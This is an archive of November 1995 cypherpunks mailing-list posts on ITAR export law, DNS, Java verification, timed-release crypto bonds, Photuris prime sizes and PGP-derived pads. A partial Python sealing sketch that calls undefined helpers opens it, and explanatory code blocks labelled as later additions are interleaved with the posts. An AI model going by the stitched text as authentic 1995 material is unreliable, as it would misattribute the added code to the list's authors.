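def seal(message, houses, n, release_at):
    """Share the message n-of-m and encrypt one share to each house's key."""
    value = int.from_bytes(message, "big")
    if value >= P:
        raise ValueError("message too long for this toy field")
    sealed = []
    for house, (x, y) in zip(houses, split(value, n, len(houses))):
        key_id, public = house.new_key(release_at)
        sealed.append((house, key_id, x, encrypt(public, y)))
    return sealed      # may be stored openly, as the post says


def unseal(sealed, n, now):
    """Ask each house for its key; succeed once n of them release."""
    shares = []
    for house, key_id, x, ciphertext in sealed:
        secret = house.request_secret(key_id, now)
        if secret is not None:
            shares.append((x, decrypt(secret, ciphertext)))
    if len(shares) < n:
        return None
    value = combine(shares[:n])
    return value.to_bytes((value.bit_length() + 7) // 8, "big")


if __name__ == "__main__":
    date_x = datetime(1996, 1, 1, tzinfo=timezone.utc)
    houses = [CryptoHouse(name) for name in ("A", "B", "C")]
    bond = b"constructed sample: pay bearer $1100"
    sealed = seal(bond, houses, 2, date_x)
    print(unseal(sealed, 2, datetime(1995, 11, 7, tzinfo=timezone.utc)))
    print(unseal(sealed[1:], 2, date_x))      # one house missing, still opens
```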




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 7 Nov 1995 15:11:29 +0800
To: owner-cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
Message-ID: <9511070647.AA00471@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>Originally DNS was just a handy user-friendly thing, but then
>it became the primary way to name a host.  This allowed the IP address
>to become irrelevant, which allows entire sites to be renumbered when the
>network topology changes.  This is important to keep the routing tables
>small (by minimizing the backwards-compatibility exceptions), which is
>a critical problem today.  Thus all recent architectural decisions have
>been away from direct use of IP addresses anywhere.

Hunh?

The Arpanet always used hostnames.  Just about the only time you
needed to specify a raw network address was when you were dialed into
a TAC and you did things like "@o 137" to connect to mit-mc.

DNS was created because the hosts.txt file, a single network-wide
file that listed the name, address, aliases, system type, etc., of
every host in the Arpanet got to be unmaintainable.

Routing is totally unrelated to DNS, based as it is in IP addresses.
Routers know nothing about DNS.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 7 Nov 1995 15:33:17 +0800
To: owner-cypherpunks@toad.com
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <9511070710.AA00528@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Strangely
>enough this would seem to hurt, not help, the NSA in the most important
>part of their current mission, which is to help protect US industry
>against industrial espionage and virtual terrorism, which is a far more
>pressing threat. 

Matt's NATO adventures, for example, are an interesting example of what
happens when the two missions -- "protect our secrets" and "read theirs"
-- come into conflict.  (Not unlike the US Dept of Agriculture.)  Their
open involvement in places like W3C, where Agency staff talk about getting
Fortezza cards in COTS products provides another datapoint.

Budget cuts may turn out to be strong crypto's best friend.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Tue, 7 Nov 1995 17:13:04 +0800
To: cypherpunks@toad.com
Subject: Re: Java insecurity - long - argumentative - you are warned.
Message-ID: <v01510103acc4ce7ca31a@[206.1.161.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>> > While all this checking appears excruciatingly detailed, by the time
>> > the byte code verifier has done its work, the Java interpreter can
>> > proceed knowing that the code will run securely. Knowing these
>> > properties makes the Java interpreter much faster, because it doesn't
>> > have to check anything.
>
>Yikes!!  I'll leave this for someone else to address.  This sounds to me
>like a variation on virus scanning.  I think that there are far more
>reputable virus experts than I who can comment and expand on *flaws* with
>that approach.

This "checking," as any comp-sci undergrad will tell you, amounts to solving
the halting problem for the java interpreter. While this is possible for a
finite state automata like the java interpreter (made more difficult by the
fact that it can use the "net" for additional state), it is not even
remotely feasable.

If you can write a checker that works in a reasonable amount of time, I'll
write a turing machine simulator that'll do something nasty if the input
machine halts. Then we'll split the fame and fortune for solving the 5 state
Busy Beaver problem. Deal?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBgAwUBMJ8gtXIf3YegbdiBAQGqMQJXWzwuPYM2bNb96Fgfb1wGeDC83fNFOW5H
8PQHbnt8bDFsHxKv2L8kcBhtO/TWA0cugVYR9YFf2BOaGoA2UIoCBdwfABM1HAKU
hd0H
=TA2E
-----END PGP SIGNATURE-----

Dietrich Kappe | Red Planet    http://www.redweb.com
Red Planet, LLC| "Chess Space" | "MS Access Products" |  PGP Public Key
1-800-RED 0 WEB|    /chess     |       /cobre         | /goedel/key.txt
Web Publishing | Key fingerprint: 8C2983E66AB723F9 A014A0417D268B84






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 14:56:19 +0800
To: cypherpunks@toad.com
Subject: Re: toolkits?
In-Reply-To: <199511070141.UAA15583@maple.sover.net>
Message-ID: <47moi5$ahc@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511070141.UAA15583@maple.sover.net>,
Stephen Whitaker <whitaker@sover.net> wrote:
> What constitutes a basic toolkit for trace route, sniff for promiscuous
> mode, all the other tools to map what's happening to net traffic in a little
> state of 1/2 million people? What are the sources of traffic information?

It won't help, because tapping wouldn't be done at the BGP4 level,
but at the switch (if with telco cooperation) or directly on the lines.
*You need end-to-end encryption*.  You need Kerberos or IPSEC.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 7 Nov 1995 21:25:25 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511070405.XAA14913@jekyll.piermont.com>
Message-ID: <m0tCngd-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" writes:

: "Peter D. Junger" writes:
: 
: > If a Frenchman on vacation in the Riviera shows a copy of PGP sourcecode
: > to a German businessman there, that is literally a violation of the
: > ITAR.
: 
: Where the hell did you get that idea?  

From Section 120.17 of the ITAR which provides:

 _Export_ means:

 . . . .

 (4) Disclosing (including oral or visual disclosure) or transferring
 technical data to a foreign person, whether in the United States or
 abroad . . . .

(And technical data is (baroquely) defined in Section 120.10 as
including certain software, including cryptographic software.)

: The ITAR clearly does not apply
: to foreigners disclosing things to each other outside the United
: States. 

Where the hell did you get that idea?  

: I've read it and I can't see how it could possibly be so
: interpreted. I'm not a lawyer, but this interpretation is so bizarre
: as to be almost untenable. I can clearly see that a U.S. person
: talking about DES to a foreign person can be a violation under the
: language in the regulations, but there is no way on earth to interpret
: the regulations as applying to foreigners abroad talking to other
: foreigners outside the U.S.

Go read the section that I quoted again.  Where is there an exception
for foreign persons who happen to be abroad?  

: > Don't expect the ITAR to make any sense.  And don't think that you can
: > apply logic to the ITAR and get logical results.  It doesn't work that
: > way.

: I was under the impression, though, that the words meant what they
: said.

When did you change your mind?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 7 Nov 1995 21:19:20 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <Pine.SOL.3.91.951106202632.8543C-100000@chivalry>
Message-ID: <m0tCnq6-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero writes:

: On Mon, 6 Nov 1995, Peter D. Junger wrote:
: 
: > 
: > Don't blame this on my being a lawyer; blame it on some very sick
: > people in the Office of Defense Trade Controls and in the NSA.
: 
: I think it's unfair to call the people at the ODTC and the NSA sick; 
: during the cold war, such restrictions did make some sense; in 
: particular, controlling the export of high-performance encryption 
: hardware does make it harder for other countries to deploy ubiquitous 
: strong encryption, particularly in the less developed countries, and 
: particularly for chips that required exotic fabrication (the soviet union 
: never had really good mass-production facilities). 

The ones I was suggesting are sick are the ones who drafted the
definition of ``export'' and of ``technical data'' in the ITAR.  Would
you consider it more appropriate if I called them perverse?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 7 Nov 1995 22:29:12 +0800
To: tcmay@got.net
Subject: Re: toolkits?
Message-ID: <9511071418.AA25542@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May wrote:
>
> At 12:41 AM 11/7/95, Stephen Whitaker wrote:
> 
> >just might have a prayer of doing it right, whatever that is. What would it
> >look like if secure communications and anonymity were designed in from the
> >start? Is this what Sameer is doing in Bezerkeley?
> >
> >What machines are considered minimum requirements to use these tools? What
> >are the essential reference works?
> 
> "Security and anonymity" are not matters for government to ensure.
> 
[...]
> I urge you, Stephen, to read up on encryption and the benefits contained
> therein. Looking to your state capital to secure your communications is a
> lose.
> 
 
Tim - I think your libertarian side is showing here....
Not that this is a bad thing, but I think there are some things 
that state governments can and/or should do.

First off - avoid trying to legislate minute details of any encryption
or signature scheme.  Bureaucrats trying to understand, much less control
technical things is doomed to fail.  (take GOSIP as a prime example)

Second - push for legal acceptance of digital signatures and
acceptance of privacy through encryption.  I believe Utah has taken a strong 
step in this direction.  Most people, businesses, and courts won't accept
digital contracts and the like until there is more of a sound
set of laws behind them.  Strong laws against government snooping or
against anti-encryption or anti-anonymous laws are a good thing IMO.
Besides - laws like that will let the bureaucrats drown themselves
in their own paperwork making sure they follow their own rules - and keep 
them out of our hair. ;-)

Third - provide services to the citizenry.  For example - provide
a public key server.  Or how about a digital time-stamping service.
If the crap was kept out of these services, and they were free for
anyone to use, then it would advance the idea of encouraging people to
use crypto in their daily lives.

Warning - Although I think there are some good things that governments
can do, it is also very important to watch out for "sabotage" by 
the government.  Governments tend to like control too much and by
trying to maintain control, reverse a useful service to one that
is a dis-service to the people.  In general, if governments get
out of the way, people will take care of problems themselves.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 17:26:29 +0800
To: cypherpunks@toad.com
Subject: Re: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <9511070647.AA00471@sulphur.osf.org>
Message-ID: <47n7m0$i3k@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <9511070647.AA00471@sulphur.osf.org>,
Rich Salz <rsalz@osf.org> wrote:
> >Originally DNS was just a handy user-friendly thing, but then
[...]
> Hunh?
> 
> The Arpanet always used hostnames.

Sorry.  But still, the intent was to be user-friendly (right?), and
a side effect was to make it possible to renumber without anyone noticing.

Renumbering didn't affect the health of the net until recently, with
CIDR, where blocks of IP addresses could be aggregated arbitrarily.
A provider might now get 10.11.12/22 (i.e., a 22-bit-long prefix), and
then assign customers 10.11.12/24, 10.11.13/23, &c., with only one entry
in the backbone routing tables.  To make this work you have to renumber
when you change providers.  Fortunately, we have DNS to provide a name
more stable than the IP address.

That's the connection between DNS and routing, and it's why using names
instead of numbers is Good.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Tue, 7 Nov 1995 23:07:20 +0800
To: Cypherpunks <ohuf@relay.sedat.de>
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <Pine.NXT.3.91.951107144209.255A-100000@oe1>
Message-ID: <m0tCpU8-0004LGC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Oliver Huf writes:

: 
: 
: On Tue, 7 Nov 1995, Peter D. Junger wrote:
: 
: > From Section 120.17 of the ITAR which provides:
: > 
: >  _Export_ means:
: >  . . . .
: >  (4) Disclosing (including oral or visual disclosure) or transferring
: >  technical data to a foreign person, whether in the United States or
: >  abroad . . . .
: 
: The ITAR is U.S.-Law. This only applies (by definition) to US-citizens
: or persons in the U.S.!

Go tell that to General Noriega.  I don't know what definition you are
talking about, but it is not one recognized by the American Courts.

: I think it's a common mistake of many Americans that they believe
: creating law means creating law for the whole world!

: > Go read the section that I quoted again.  Where is there an exception
: > for foreign persons who happen to be abroad?  
 
: It's inherent. You simply can't apply US-law to non-US-citizens outside
: the U.S.!  

The American courts will apply American laws to non-US-citizens who
violate American laws outside the United States, if they can catch
them.  The fact that they may be in the United States because they
were kidnapped or because they were captured outside the United States
in an aggressive war that quite clearly violated international law
won't stop them for a moment.  And lord help the foreigner who has 
violated US law outside the US and then tries to immigrate to the
United States.

And the United States is not alone in this.  Look what Israel did to
Eichmann.

And didn't Denmark just allow Germany to extradite an American citizen
for nasty things that he wrote and said in the United States?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 7 Nov 1995 23:46:19 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCngd-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951107102406.21752D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I am delighted to discover that there is a person in this world who reads 
the ITAR more broadly than I do.  I can see how the ITAR could be read to 
reach a Frenchman who sends crypto via email to a German that happens, 
through no fault of his own, to be routed via New York; we might have to 
talk about whether the scienter requirement would mean that M. Frenchman 
knew or should have known about the routing.  [NB "could be read" does 
not equal "should be read".]

Not even I, however, would imagine that any court anywhere, could read 
the ITAR or the legislation authorizing it (which is more to the point) 
as reaching two foreigners talking abroad, neither of whom is a US person.

Not only does the US lack the jurisdiction to make such a rule, it has 
never sought to make such a rule in any context I am aware of (no, 
foreign wars don't count).  Not even in anti-trust or securities, 
where the extraterritorial jurisdictional assertions are premised on the 
effects of the foreign act to the US market...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 18:42:27 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto and information economics
In-Reply-To: <acc4182012021004674b@[205.199.118.202]>
Message-ID: <47ncgr$ji6@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <acc4182012021004674b@[205.199.118.202]>,
Timothy C. May <tcmay@got.net> wrote:
> This seems to be saying the same thing. In both cases, "Alice" is either
> distributing a message to"Bob," "Charles," "Donna," etc., with instructions
> not to return the pieces until Date X, or is holding onto a sealed message
> but asking that the decryption keys not be returned until Date X. I don't
> see the real difference, modulo some minor factors. In neither case can the
> original message be reconstructed unless n out of m of the escrow agents
> provide the pieces.

Here are some attacks where my scheme is more resistant.  I'll suppose
that Alice is writing a bond, i.e., time-delayed cash, to Bob.


1. Alice does not really write a bond

In my plan, Alice gives Bob the message along with a certificate saying
that it is a bond.  If the message is actually not a bond, Bob can
demonstrate fraud upon the maturity date without revealing his identity,
by posting the now-readable message along with the contradictory signed
statement from Alice.

In your plan, Alice cannot provide the actual message to Bob, nor
prove that she even sent anything through the blind remailer network.
Bob would have to ask her to sign a certificate saying that she wrote
a bond to Bob for $n to mature on date X; she may not be willing to
admit that in a publicly demonstrable way.  And if she defrauded Bob,
he cannot prove he did not receive a bond.


2. The crypto houses lose keys/messages

In my plan, the crypto house's signature on the public key it issues
guarantees that the secret key will be available upon the maturity date.
If the house loses the secret key, then anyone can prove this, again
anonymously, by publishing the signed public key and asking anyone to
try to purchase the corresponding secret key.  The house cannot say it
is a false claim.  The unreliable house hemorrhages reputation, and Bob
still has his money as long as n houses were reliable.

In fact, even if Bob ca'n't trust n houses, he can still hedge.  He would
just buy a futures coupon saying that the house in question will lose
a key.  This is a classic use of hedging, and it allows him to recover
his money, anonymously.

In your plan, you just have to hope the remailers don't lose more than
m-n parts.  You rely on reputation-raters to judge reliability in a
probabilistic manner.  This works ok currently, with amateur remailers,
but not in a future world held to the 100% standards of financial
reliability.  (And those standards are very high.  Consider the public
reaction if you saw proof that a bank had "lost" someone's checking
account, one among a million.)


3. The crypto houses leak keys/messages

In my plan, this is ok.  You need both the keys *and the message*
to decrypt.  Only Bob holds the message.  (It's axiomatic that you can
keep a secret out of self-interest; your personal private key is such
a secret.)  In fact, at the maturity date, the secret keys will become
available to anyone, and Bob still won't be hurt.

Meanwhile, crackers have incentive to steal keys even without breaking
messages, because they can use them to make a profit on "Megahouse leaks
keys" futures, by posting the secret key matching a signed public key.
This can be anonymous, or they can use it to raise their nym's reputation
among crackers.  Because Megahouse knows it will be caught *every time*
it leaks, it must keep 100% financial-quality security.  This is an
excellent failure mode because all failures will be public.

In your plan, you just have to hope fewer than n pieces are made available
to the cracking ring.  And when you get a bond consisting of double-spent
bills, you ca'n't tell who broke security.  This is intractable for a
reputation-rater to determine to the necessary standards of accuracy.


4. Alice leaks the message

This is "fraud through negligence" and is treated as in case 1.  If Bob
thinks it's likely, he can hedge by buying a "Alice shown untrustworthy"
futures coupon.  (Those will be *so* useful.)


Because of the two-part design of a delayed message, it takes collusion
by those in possession of ciphertext *and* keys to unseal a message.
Before the maturity date, only Alice and Bob have the message, and only
the banks have the keys.  The message is of value only in that it will
be valuable in the future along with the then-available secret keys.
(Or, I suppose, possibly to prove fraud; that's of even more value.)
All collusion can be righted, everything is anonymous unless reputations
are involved, and all fraud is publicly exposed.

These are interesting properties.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ81SeyjYMb1RsVfAQG5GQP/RP5IkcQUFo++aBWHUmoTGuIBphykQxp/
HR40yt4GzIJQUIpEbM7iiD6Dk9hDLoF4GY9MQrPnxmhfGu4uITxYeDMfsPHJLv01
xCu9//xYJ9Usb3eWJFSURhBkSQg05T4upZX2KTj5NlTB4dbMJumReDeUix236FaU
W2eRxdiw0Us=
=zCpp
-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William Allen Simpson" <bsimpson@morningstar.com>
Date: Tue, 7 Nov 1995 23:33:13 +0800
To: cypherpunks@toad.com
Subject: Re: Photuris Primality verification needed
Message-ID: <1997.bsimpson@morningstar.com>
MIME-Version: 1.0
Content-Type: text/plain


I wish to roundly thank all those that responded to our need for
verification.  We had several excellent responses.  The primes have now
been better verified using Miller-Rabin with different platforms, and
with separately coded math libraries.  More exhaustive testing is
ongoing.

Thanks are due to Wei Dai and Frank A Stevenson, as well as independent
math libraries by Rich Schroeppel and Eric Young.

Bill.Simpson@um.cc.umich.edu
          Key fingerprint =  2E 07 23 03 C5 62 70 D3  59 B1 4F 5E 1D C2 C1 A2




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William Allen Simpson" <bsimpson@morningstar.com>
Date: Tue, 7 Nov 1995 23:31:52 +0800
To: bal@martigny.ai.mit.edu
Subject: Re: Photuris Primality verification needed
Message-ID: <1999.bsimpson@morningstar.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: "Brian A. LaMacchia" <bal@martigny.ai.mit.edu>
>    > Recently, someone asked for a smaller prime of only 512-bits for speed.
>    > This is more than enough for the strength of keys needed for DES, 3DES,
>    > MD5 and SHA.  Perhaps this would be easier to have more complete and
>    > robust verification as well.
>
> Our practical experiences with discrete logs suggests that the effort
> required to perform the discrete log precomputations in (a) is slightly
> more difficult than factoring a composite of the same size in bits.  In
> 1990-91 we estimated that performing (a) for a k-bit prime modulus was
> about as hard as factoring a k+32-bit composite.  [Recent factoring work
> has probably changed this a bit, but it's still a good estimate.]
>
Thanks.  I have added the [from Schneier] estimate

   e ** ((ln p)**1/2 * (ln (ln p))**1/2)

and number field sieve estimate

   e ** ((ln p)**1/3 * (ln (ln p))**2/3)

to the Photuris draft, with a small amount of explanation.

Hilarie Orman posted that 512-bits only gives an order of 56-bits
strength, 1024-bits yields 80-bits strength, and 2048 yields 112-bits
strength.  I do not have the facilities to verify her numbers.

As most of us agree that 56-bits is not enough (DES), the 512-bit prime
seems a waste of time and a tempting target.  I'd like to drop it, but
Phil is inclined to keep it with a disclaimer.

Bill.Simpson@um.cc.umich.edu
          Key fingerprint =  2E 07 23 03 C5 62 70 D3  59 B1 4F 5E 1D C2 C1 A2
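
The two work-factor estimates quoted in the message above can be evaluated directly, which gives a way to check the 56/80/112-bit figures it cites. This is an added example, not part of the Photuris draft or the original post; it reads the exponents as 1/2, 1/3 and 2/3, and the constant (64/9)^(1/3) for the number field sieve is the textbook asymptotic value, an assumption that does not appear in the message.

```python
"""Evaluate the subexponential work-factor estimates for a k-bit prime modulus."""
import math

# Textbook asymptotic constant for the general number field sieve (assumption:
# the message quotes the formula with no constant, i.e. c = 1).
NFS_CONSTANT = (64 / 9) ** (1 / 3)


def work_bits(modulus_bits, a, c=1.0):
    """log2 of exp(c * (ln p)**a * (ln ln p)**(1 - a)) for p close to 2**modulus_bits."""
    ln_p = modulus_bits * math.log(2)
    exponent = c * ln_p ** a * math.log(ln_p) ** (1 - a)
    return exponent / math.log(2)


def older_estimate_bits(modulus_bits):
    """First formula in the message: exponents 1/2 and 1/2."""
    return work_bits(modulus_bits, 1 / 2)


def nfs_estimate_bits(modulus_bits, c=NFS_CONSTANT):
    """Second formula in the message: exponents 1/3 and 2/3."""
    return work_bits(modulus_bits, 1 / 3, c)


def min_modulus_bits(target_bits, estimate=nfs_estimate_bits, step=64):
    """Smallest multiple of `step` whose estimated work reaches target_bits."""
    size = step
    while estimate(size) < target_bits:
        size += step
    return size


def comparison_table(sizes=(512, 1024, 2048), quoted=(56, 80, 112)):
    """Rows of (modulus bits, older estimate, NFS c=1, NFS textbook c, quoted figure)."""
    rows = []
    for size, figure in zip(sizes, quoted):
        rows.append((size,
                     round(older_estimate_bits(size), 1),
                     round(nfs_estimate_bits(size, c=1.0), 1),
                     round(nfs_estimate_bits(size), 1),
                     figure))
    return rows


if __name__ == "__main__":
    print("bits  sqrt-form  NFS(c=1)  NFS(textbook c)  quoted")
    for row in comparison_table():
        print("%4d  %9.1f  %8.1f  %15.1f  %6d" % row)
    print("modulus for 80-bit work (NFS):", min_modulus_bits(80))
```

These asymptotic formulas drop lower-order terms, so they give rough orders of magnitude rather than calibrated costs; with the textbook constant the number field sieve curve comes out a few bits above each quoted figure.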




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Tue, 7 Nov 1995 23:30:52 +0800
To: cypherpunks@toad.com
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <Pine.NXT.3.91.951107144209.255A-100000@oe1>
Message-ID: <Pine.HPP.3.91.951107154858.9847A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995, Oliver Huf wrote:

> It's inherent. You simply can't apply US-law to non-US-citizens outside
> the U.S.!  

Well, also (?) the Exxon bill tries to do just that.

If you put up 'indecent' material at your .de site that persons in the
US can ftp or browse or whatever, and the Exxon bill passes, you can
be sentenced to (at least) 2 years jail in the US. Presumably, since
they don't think you are as important as the infamous ex Panama
president, they won't come and get you, but might meet you at the
airport if you ever plan to visit the US. (They will not try to
get you sentenced in a German court since you haven't committed any
crime in Germany, and the German Government will probably not
extradite you - I'm not familiar with German extradition laws, though.)

With only one military superpower left we can expect its jurisdiction
to expand as it seems fit.

Mats





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Tue, 7 Nov 1995 11:03:53 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: RE: using pgp to make an otp
Message-ID: <01HXC3AEU9BM91Y89B@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-- [ From: amp * EMC.Ver #2.3 ] --

> While in theory the output of PGP would be ``random'' enough for a
> one-time pad, you need to take into account that there is ``header''
> information in a PGP message.  This info in the first several bytes
> indicates which key was used, how big the message is, whether the
> receiving PGP should save the decrypted file, etc. This part is not
> very random at all.

i understand the non-random portions of the pgp output, which is why i
specified in my original message that the 1st 20 or so lines would find
their way to the bit bucket.

> The weakness in this method is that the ``key'' to the OTP is composed
> of the PGP encryption key and the plaintext used to generate the
> pad.  Both would have to be fairly well protected to prevent a bad
> guy from either a) generating his own copy of the OTP by obtaining
> the key and plaintext or b) forcing you to use a known OTP by munging
> your copy of the key or plaintext.

i'm confused here. how would the 'key' to the otp be related to my pgp
encryption key? if i strip off all the identifying information that pgp
uses to recognise how to decrypt a message, and destroy the 'clean' copy of
the file(s) that eventually became part of my otp, how could the resulting
output be tied to my key? if it could, then pgp is less secure than i give
it credit for being.

if your objection is based on the fact that my public key is a known entity,
this can easily be bypassed by creating a brand new key from a freshly
unzipped copy of pgp. use that key to create the otp, then destroying the
key(s) used to create it.

> This technique does have its uses.  For instance, if you use DES you
> can ``seed'' it with a value, then by re-encrypting the output of DES
> repeatedly you can generate an essentially random sequence of
> values.  This can be used as a OTP for a stream cypher.

isn't this essentially what i'm doing? if it is necessary, i can do
this...(assuming a virgin key)
1. create a cyphertext of a file.
2. strip the identifying lines.
3. create a new cyphertext from the resulting file. 
4. repeat until paranoia level < comfort zone.

my point here is that _if_ pgp output is random enough, i wouldn't need
hardware. even i, with my extremely limited programming skills could create
a .cmd file or program that could be used as input for a stream cypher.

imo, for crypto to be useful, it has to be easy. i'm trying to find a way
to do this that can be implemented anywhere.
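
The point raised in the quoted reply, that a pad produced by repeated encryption is only as secret as the key and the seed file behind it, can be shown in a few lines. This is an added example, not code from the thread; HMAC-SHA256 stands in for the PGP or DES encryption step, and the key, seed files and message used with it are constructed.

```python
"""A 'pad' made by re-encrypting output is a keyed stream, not a one-time pad."""
import hashlib
import hmac
import secrets


def iterated_pad(key, seed_file, length):
    """Feed a keyed function its own output and concatenate the blocks.

    HMAC-SHA256 is a stand-in (assumption) for "encrypt, strip the header,
    encrypt again"; the structure, not the primitive, is what matters here.
    """
    block = hmac.new(key, seed_file, hashlib.sha256).digest()
    pad = bytearray()
    while len(pad) < length:
        block = hmac.new(key, block, hashlib.sha256).digest()
        pad += block
    return bytes(pad[:length])


def xor(data, pad):
    """Combine data with a pad that is at least as long as the data."""
    if len(pad) < len(data):
        raise ValueError("pad shorter than message")
    return bytes(d ^ p for d, p in zip(data, pad))


def recover_with_inputs(ciphertext, key, seed_file):
    """Anyone holding the key and the seed file rebuilds the pad and reads the text."""
    return xor(ciphertext, iterated_pad(key, seed_file, len(ciphertext)))


def identify_seed(ciphertext, known_prefix, key, candidate_files):
    """Index of the candidate file whose pad turns the ciphertext into known_prefix.

    With the key exposed, the pad is no harder to guess than the choice of
    seed file, however long the pad itself is.
    """
    head = ciphertext[:len(known_prefix)]
    for index, candidate in enumerate(candidate_files):
        if xor(head, iterated_pad(key, candidate, len(head))) == known_prefix:
            return index
    return None


if __name__ == "__main__":
    key = b"constructed-key!"                      # constructed sample values
    files = [b"readme.txt contents", b"letter to bob", b"holiday photo bytes"]
    message = b"MEET AT NOON"
    sent = xor(message, iterated_pad(key, files[1], len(message)))
    print(recover_with_inputs(sent, key, files[1]))    # same inputs, same pad
    print(identify_seed(sent, b"MEET", key, files))    # which file was the seed
    # A pad drawn from the OS random source has no inputs to regenerate it from.
    truly_random = xor(message, secrets.token_bytes(len(message)))
    print(identify_seed(truly_random, b"MEET", key, files))
```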





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 9 Nov 1995 04:09:37 +0800
To: Stephen Whitaker <cypherpunks@toad.com
Subject: Re: nym-compoop
Message-ID: <acc2c76d080210041e54@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


[I have taken the liberty of deleting "speaker@leg.state.vt.us"  and
"villuzzi@leg.state.vt.us" from the cc: list, as I think cross-pollinating
our list with state assembly houses is even worse than being "assimilated"
by wwwbuyinfo and e$-list.]


At 2:35 AM GMT 11/6/95, Stephen Whitaker wrote:

>Eating my tasty crow gives rise to another question relating to the timing
>and continuity of these threads: How did the first responder on the RE:
>134.222.9.1, Simon Spero, reply at 10:48 pm on Nov. 4 to Anonymous' posting
>of 7:19AM on Nov 5? Which way is this thing spinnin?

Have you heard of time zones?

The first message, from Anonymous, was sent from the Replay remailer (in
Amsterdam, I recall).

Date: Sun, 5 Nov 1995 07:20:12 +0100
Subject: lp (134.222.35.2)?
To: cypherpunks@toad.com
From: nobody@REPLAY.COM (Anonymous)

07:20 in the +0100 timezone is of course 22:20 of the previous day
(Saturday) in the -0800 time zone.

The reply by Spero was sent

